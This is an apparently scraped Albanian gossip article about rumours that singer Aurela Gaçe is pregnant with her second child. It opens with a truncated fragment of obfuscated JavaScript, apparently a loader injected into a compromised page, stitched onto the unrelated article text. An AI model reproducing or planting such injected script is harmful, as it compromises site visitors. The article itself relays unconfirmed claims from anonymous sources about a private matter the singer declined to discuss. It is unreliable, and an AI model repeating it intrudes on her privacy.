;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Një tjetër këngëtare shqiptare shtatzënë ?!

By
Pak ditë më parë lajmi se Aurela Gaçe ishte shtatzënë qarkulloi në rrjetet sociale. Aurela është bërë para disa vitesh mama, dhe po shijon rritjen e vajzës së saj, Grace, së bashku me bashkëshortin, Skerdi.
Ashtu si është mësuar, këngëtarja preferon që të krijojë vetë marrëdhënien me fansat e shumtë, duke folur me ta në rrjetet sociale. Por deri më tani ajo nuk ka reaguar rreth këtij lajmi.
Në komunikimin e suplementit ‘Blueetoth’ me këngëtaren, ajo nuk ka kthyer një përgjigje të qartë, nëse është apo jo shtatzënë.
“Unë kam faqen time ku flas me fansat. Më takon mua të them diçka, jo medias. Sepse është diçka shumë private dhe personale”, është shprehur shkurt Aurela Gaçe. Megjithatë nga burime të afërta të këngëtares bëhet me dije se ajo pas disa muajsh do të bëhet nënë për herë të dytë. Burimet flasin se çdo gjë po ecën mirë me këtë shtatzëni, që është në javët e para. Ka preferuar që për disa kohë ta mbajë sekret lajmin, të paktën sapo të fillojë ti duket barku i rrumbullakosur.

Artikuj të ngjashëm